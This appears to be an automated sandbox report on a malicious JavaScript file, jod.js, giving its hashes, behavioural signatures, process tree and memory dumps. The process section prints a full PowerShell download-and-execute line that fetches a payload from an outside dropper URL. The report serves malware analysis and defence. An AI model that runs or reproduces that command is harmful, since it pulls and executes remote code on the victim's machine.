Analysis
- max time kernel: 28s
- max time network: 32s
- platform: windows7_x64
- resource: win7-20230220-en
- resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
- submitted: 18-05-2023 14:11

Static task: static1

Behavioral task: behavioral1
- Sample: jod.js
- Resource: win7-20230220-en
- Platform: windows7-x64
- 5 signatures
- 150 seconds
General
- Target: jod.js
- Size: 170KB
- MD5: ea6103815cb06653775743a337f9d934
- SHA1: 9ec5e3f4bb4b39fcb61e0a5f15b0c6244a15ad60
- SHA256: b9ca6866ff2792c9472c7dfd63e58dac2b3d51157a3d5bea252c873a4ea29df5
- SHA512: 7fd07e097673d14783117dd4180538ae0057530cecfb4eac14126f437272eb07e9bea10aed7ba610a9039a3ca9d08156d82e12bb89454abad1e29870e4797e73
- SSDEEP: 3072:zbT1AJM/EaZ8ok36/EI4+ZQSU2bokXPXliq3kJIAsKL3bT1AJM/EaZ8ok36/EI4c:zbZ0M/EaZ8ok36RftbokXsbZ0M/EaZ8M
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Deobfuscated: yes
- URLs:
  - ps1.dropper: https://propagandaetrafego.com/b.jpg
Signatures
- Blocklisted process makes network request (2 IoCs)
  Processes (flow / pid / process):
  - 4 / 1312 / powershell.exe
  - 5 / 1312 / powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes (pid / process):
  - 1312 / powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes (description / pid / process):
  - Token: SeDebugPrivilege / 1312 / powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes (description / pid / process / target process):
  - PID 1696 wrote to memory of 1312 / 1696 / wscript.exe / powershell.exe
  - PID 1696 wrote to memory of 1312 / 1696 / wscript.exe / powershell.exe
  - PID 1696 wrote to memory of 1312 / 1696 / wscript.exe / powershell.exe
Processes
- C:\Windows\system32\wscript.exe (depth 1)
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\jod.js
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2, child of wscript.exe)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX (New-Object Net.WebClient).DownloadString.Invoke('https://propagandaetrafego.com/b.jpg')
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Downloads
- memory/1312-59-0x000000001B2F0000-0x000000001B5D2000-memory.dmp (Filesize: 2.9MB)
- memory/1312-58-0x00000000028A0000-0x0000000002920000-memory.dmp (Filesize: 512KB)
- memory/1312-61-0x0000000002290000-0x0000000002298000-memory.dmp (Filesize: 32KB)
- memory/1312-60-0x00000000028A0000-0x0000000002920000-memory.dmp (Filesize: 512KB)
- memory/1312-62-0x00000000028A0000-0x0000000002920000-memory.dmp (Filesize: 512KB)
- memory/1312-63-0x00000000028A0000-0x0000000002920000-memory.dmp (Filesize: 512KB)